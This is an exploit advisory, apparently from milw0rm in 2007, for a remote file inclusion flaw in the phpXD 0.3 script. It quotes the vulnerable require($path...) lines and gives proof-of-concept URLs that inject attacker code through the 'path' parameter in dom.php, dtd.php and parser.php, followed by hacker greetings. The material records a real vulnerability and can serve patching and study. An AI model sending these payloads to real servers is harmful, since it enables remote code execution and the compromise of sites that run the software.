31 lines
No EOL
1.7 KiB
Text
31 lines
No EOL
1.7 KiB
Text
_________________________________
|
|
________| |________
|
|
\ | Dr Max Virus | /
|
|
\ | | /
|
|
/ |_________________________________| \
|
|
/___________) (___________\
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Script:phpxd
|
|
Affected Version:0.3
|
|
Downlaoad:http://websec.science.uva.nl/~kaper/xml_archief/phpXD/phpxd_0.3.tar.gz
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Author:Dr Max Virus
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Bug in (include/)
|
|
Vul Code;
|
|
require($path."include/dom/Node.php");
|
|
require($path."include/dom/Attr.php");
|
|
require($path."include/dom/CharacterData.php");
|
|
require($path."include/dom/Comment.php");
|
|
require($path."include/dom/Document.php");
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
POC:
|
|
http://[target]/[path]/include/dom.php?path=[Bad Code]
|
|
http://[target]/[path]/include/dtd.php?path=[Bad Code]
|
|
http://[target]/[path]/include/parser.php?path=[Bad Code]
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
|
|
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2007-01-23] |